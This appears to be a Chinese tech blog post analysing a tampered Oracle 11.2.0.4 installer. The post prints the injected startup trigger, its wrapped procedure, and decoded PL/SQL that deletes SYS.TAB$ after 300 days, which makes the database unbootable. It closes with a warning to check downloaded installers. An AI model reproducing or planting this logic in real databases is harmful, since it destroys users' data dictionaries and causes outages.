20190925-ORA-00600错误及被注入的软件

已于 2023-07-28 00:11:20 修改
阅读量2.4k 收藏
点赞数 2
分类专栏: Oracle 文章标签: oracle
于 2019-09-25 20:01:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tttzzzqqq2018/article/details/101381649
版权

昨天在家,打开数据库发现,连接不上,报错,ORA-00600。在网上找了很多方法试过都不行,最后看到有人说是 被注入的软件,就是说oracle11.2.0.4的安装包被注入过了,超过300天就会出问题。

被注入的文件是:
$ORACLE_HOME/rdbms/admin/prvtsupp.plb
这个程序包文件最后被注入了一个触发器,这个启动触发器,当数据库启动之后被触发执行:

可以看到触发器DBMS_SUPPORT_DBMONITOR,不是SYS用户下系统自带的触发器。
看一下里面的内容:

create or replace trigger DBMS_SUPPORT_DBMONITOR
after startup on database
declare
begin
   DBMS_SUPPORT_DBMONITORP;
end;

说明调用了DBMS_SUPPORT_DBMONITORP这个存储过程。
在这里插入图片描述
这个存储过程也不是系统自带的。看看其中内容:

create or replace procedure DBMS_SUPPORT_DBMONITORP wrapped
a000000
369
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
abcd
7
166 17d
L+Q5S7kOFTBh3pJuFhl03zpaj2EwgzKur9zWZ47SR+pHN0Y8ER0IGya9iryn8BXxVZV99MqT
jPeDOVN1pQjRL9BBh4vtWEKCY/FfMGPnetcyOwrCiZd3y4XmBCby580I22k2zARou4x8Mwl7
GOEcpi6u23Rf2JOnTfA/PYL+pz7A1gvabRQrczX6dnK8HaHsERgX7VdwA3EsM784UwL6ESro
H+CNqON6SdF2HTUFBcmgBBPE/+blRgHQryEpxT3JOnEs1a8gUbjaLq+Xq9Eu9n/kdIwA+9ep
r59hpFLw/vnP7Cjaxk7WbJ6/XGj9F6DH+3MBxpFBmba1tk0pYAW1McQsYXNFbiSdxj1KnrmD
lUETCD2WIxfg3w==

加密过
这个触发器执行的是前面的加密代码,存储过程,这个存储过程解密后的代码如下,其代码逻辑就是,判断数据库的创建时间大于 300 天,然后创建一个备份表,备份 tab$ 内容之后,清空 TAB$ 表。
此后,数据库当然就无法启动了:

PROCEDURE DBMS_SUPPORT_DBMONITORP IS
DATE1 INT :=10;
BEGIN
SELECT TO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=300) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
END IF;
END;

所以我们再次提示大家:由于这个攻击,具有潜伏性,如果你是从网络下载了Oracle安装包,尤其是 11.2.0.4 版本,建议用户检查你的数据库,确保安全。

Tzq@2018
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ORA-00600 kcratr_nab_less_than_odr 问题处理
一名DBA的学习和成长记录
01-03 3999
ORA-00600 kcratr_nab_less_than_odr 问题处理
数据恢复:被注入软件ORA-600 16703 灾难的恢复.docx
01-22
首先,我们看到一个客户在尝试启动Oracle数据库时遭遇了ORA-01092和ORA-00704错误,随后引发了ORA-00600错误,其中错误参数包括16703、1403和20。这些错误提示表明数据库在启动过程中遇到问题,导致实例终止。 在...
ORA-00600: 内部错误代码, 参数: [kcratr_nab_less_than_odr]
热门推荐
bigger王的博客
11-12 2万+
早上同事说连不上fgdb但是可以连上xpnew这个库,让我给看下。第一反应是昨天停电服务器没有起来,然后自己测试连接如下。 C:\Windows\System32>sqlplus system/oracle@fgdb SQL*Plus: Release 11.2.0.4.0 Production on 星期三 7月 14 09:40:01 2021 Copyright (c) 1982, 2013, Oracle. All rights reserved. ERROR: ORA-01033:.
Oracle故障处理:ORA-00600错误处理思路
最新发布
但行好事,莫问前程
04-22 2774
提前说明:该故障,我只是旁观者。但处理该故障的DBA工程师,思路很清晰,我非常受教!在此也将经验分享。
ORA-00600: internal error code, arguments: [kcm_headroom_warn_1]
君子不怨天的博客
06-16 2062
一台老物理服务器搬迁,启动操作系统后尝试启动数据库报错。看这个日志我们可以发现日期明显不对,跟当前时间相差八年。查询MOS,因为时间相差过大导致数据库scn号出了问题,数据库无法启动,需要修改操作系统时间。
Oracle 比特币勒索恢复 ORA-16703 方法
Roger's oracle blog
03-15 1523
前几天某客户紧急求助我们,其Oracle数据库由于重启之后无法正常启动。最后通过数据库全备进行了一天一夜的恢复,最后仍然无法正常打开数据库。alter database open时检查发现数据库报错ORA-16703. 从用户提供的信息来看,确实是在open resetlogs的时候出现的错误。那么这个错误意味着什么呢? 其实第一眼看到这个错误;我们就大概清楚这是Oracle的数据字典出问题...
ORA-00600: internal error code 内部错误代码
小小关的博客
12-08 2万+
ORA-00600: internal error code 内部错误代码 一般出现这样的错误提示,表示可能是遇到了Oracle的bug: 1725012。错误的全文大概是: java.sql.SQLException: ORA-00600: 内部错误代码,参数: [ttcgcshnd-1], [0], [], [], [], [], [], [] 其实这样并不表示你的数据库或者数据库连接出了问题,这只是Oracle内部的bug,所以只要能够把这个错误屏蔽,
JDBC驱动for sqlserver、oracle、mysql
03-06
它由Sun Microsystems开发并被纳入Java SE(标准版)的一部分,允许开发者在Java应用程序中执行SQL语句,实现数据的增删改查。JDBC驱动是连接Java应用程序和数据库之间的桥梁,不同的数据库需要对应的JDBC驱动。 1....
ssh(struts+spring+hibernate)教务管理信息系统(全部代码) 可以直接运行
11-24
Spring是全面的后端应用程序框架,提供依赖注入(DI)和面向切面编程(AOP)。在SSH整合中,Spring作为业务逻辑的容器,管理Bean的生命周期和事务。它还能与Hibernate进行无缝集成,简化数据访问层的配置。此外,...
oracle以及linux
04-09
【描述】:Oracle数据库是全球广泛使用的数据库管理系统,而Linux作为开源操作系统,被许多企业选择作为Oracle数据库的运行平台。本资料主要探讨了如何在Linux环境中安装、配置和管理Oracle数据库,以及在日常运维中...
ORACLE应用常见傻瓜问题1000问
11-02
1. 安装与配置:安装Oracle软件时可能会遇到驱动不兼容、环境变量设置错误、权限问题等。正确配置监听器、tnsnames.ora文件和初始化参数文件(init.ora或spfile.ora)至关重要。 2. 数据库创建与管理:如何创建...
Oracle 数据库 ORA 00600
qq_43318991的博客
03-11 3742
Oracle数据库内部00600错误
ORACLE 11g 使用ROWNUM完美解决ORA-00600:内部错误代码
csdn's blog
07-30 1万+
1,ORA-00600:内部错误代码 Oracle从11.2.0.1升级到11.2.0.4,开发人员报告说一个job运行失败,调试有报错信息,ORA-00600:内部错误代码,参数:[rwoirw: check ret val],[],[],[],[],ORA-06512:…,如下图所示: C:\pic\oracle\2017040501.png 查看这个2000...
ORA-00600
qq_35708700的博客
06-07 321
mybatis连接oracle 11g报错 ORA-00600
ORA-00600 内部错误代码, 参数 [kdsgrp1]
huryer的专栏
05-10 3621
MOS:Causes and Solutions for ora-600 [kdsgrp1] (文档 ID 1332252.1)验证表结构,发现存在ORA-01499异常:表/索引交叉引用失败。
Oracle-ORA-00600:[ktspffbmb:objdchk_kcbnew_3]
sinat_36757755的博客
08-07 1168
应用执行存储过程报错ORA-00600: 内部错误代码, 参数: [ktspffbmb:objdchk_kcbnew_3], [0], [3303775], [4], [], [], [], [], [], [], [], [],导致过程无法正常执行
故障处理 ORA-00600: 内部错误代码, 参数: [kcratr_nab_less_than_odr], [1], [1348],[657132], [657133],
hnlivingyang的博客
12-03 8046
一、接客户保障,数据库主机重启后无法连接 二、检查数据库状态是mount。 SQL> select open_mode from v$database; OPEN_MODE -------------------- MOUNTED 三、进行OPEN,出现了ORA-00600错误[kcratr_nab_less_than_odr] SQL> alter database ope...
ORA-00600错误及其解决方案
浪缘的专栏
06-12 4418
ORA-00600错误及其解决方案 错误描述: 数据库版本: SQL> select * from v$version; BANNER ---------------------------------------------------------------- Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 -
ora-01092 ora-00704 ora-00600
03-02
ORA-01092错误是指在连接数据库时未能成功验证用户的身份,ORA-00704错误是指在尝试恢复数据库时发生了错误ORA-00600错误是指数据库内部发生了未知错误。要解决这些问题需要查看具体的错误信息和日志文件,然后...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tzq@2018

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值